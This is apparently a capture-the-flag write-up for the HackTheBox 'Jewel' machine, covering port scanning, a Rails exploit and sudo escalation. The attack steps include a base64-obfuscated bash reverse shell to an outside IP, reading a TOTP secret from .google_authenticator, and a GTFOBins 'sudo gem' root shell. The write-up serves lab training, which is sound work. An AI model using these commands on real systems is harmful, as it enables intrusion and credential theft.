User
[jusepe@nix:~/Documents/HackTheBox/Jewel]$ sudo scan jewel.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,8000,8080
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL: 0
Furious: 133
Nmap: 14
Total: 147
On port 8000 there is hosted GitWeb:
So checked the repository looking for versions:
Found the Ruby on Rails version which is vulnerable:
Found this POC on github and got a shell with it:
[jusepe@nix:~/Documents/HackTheBox/Jewel]$ python3 exploit.py jewel.htb 8080 fredy@user.com 1234 "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODE4MSAwPiYxCg== | base64 -d | bash"
Root
Executed LinPeas to enumerate the system and got some hashes from sql:
Broke one of the hashes and the password was spongebob, then tried to use sudo and worked but we are requested a verification code:
(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill:
Verification code:
My pet ferret can type better than you!
Found the google authentication file inside the home folder:
(remote) bill@jewel.htb:/home/bill$ ls -la
total 52
drwxr-xr-x 6 bill bill 4096 Jan 20 08:33 .
drwxr-xr-x 3 root root 4096 Aug 26 09:32 ..
lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .bash_history -> /dev/null
-rw-r--r-- 1 bill bill 220 Aug 26 09:32 .bash_logout
-rw-r--r-- 1 bill bill 3526 Aug 26 09:32 .bashrc
drwxr-xr-x 15 bill bill 4096 Sep 17 17:16 blog
drwxr-xr-x 3 bill bill 4096 Aug 26 10:33 .gem
-rw-r--r-- 1 bill bill 43 Aug 27 10:53 .gitconfig
drwx------ 3 bill bill 4096 Jan 20 08:15 .gnupg
-r-------- 1 bill bill 56 Aug 28 07:00 .google_authenticator
drwxr-xr-x 3 bill bill 4096 Aug 27 10:54 .local
-rw-r--r-- 1 bill bill 807 Aug 26 09:32 .profile
lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .rediscli_history -> /dev/null
-r-------- 1 bill bill 33 Jan 20 05:12 user.txt
-rw-r--r-- 1 bill bill 116 Aug 26 10:43 .yarnrc
(remote) bill@jewel.htb:/home/bill$ cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
Downloaded a browser extension to generate the codes with the key I just got from the google authenticator:
However when introducing the 2F authentication code got an unexpected error message:
(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill:
Verification code:
Error "Operation not permitted" while writing config
stty: unknown mode: doofus
After some doing some reserch found this comment that suggested the date of the hosts weren’t matching, so got the date from the target:
(remote) bill@jewel.htb:/home/bill$ date +%s
1611143531
Then setted that date to my own host:
[jusepe@nix:~/Documents/HackTheBox/Jewel]$ sudo date +%s -s @1611143531
1611143531
Now sudo works just fine:
(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill:
Verification code:
Matching Defaults entries for bill on jewel:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, insults
User bill may run the following commands on jewel:
(ALL : ALL) /usr/bin/gem
We can use gem as root so we can just escalate privileges following GTFObins:
(remote) bill@jewel.htb:/home/bill$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
(remote) root@jewel.htb:/home/bill$:/usr/lib/ruby/gems/2.5.0/gems/rdoc-6.0.1$ id
uid=0(root) gid=0(root) groups=0(root)
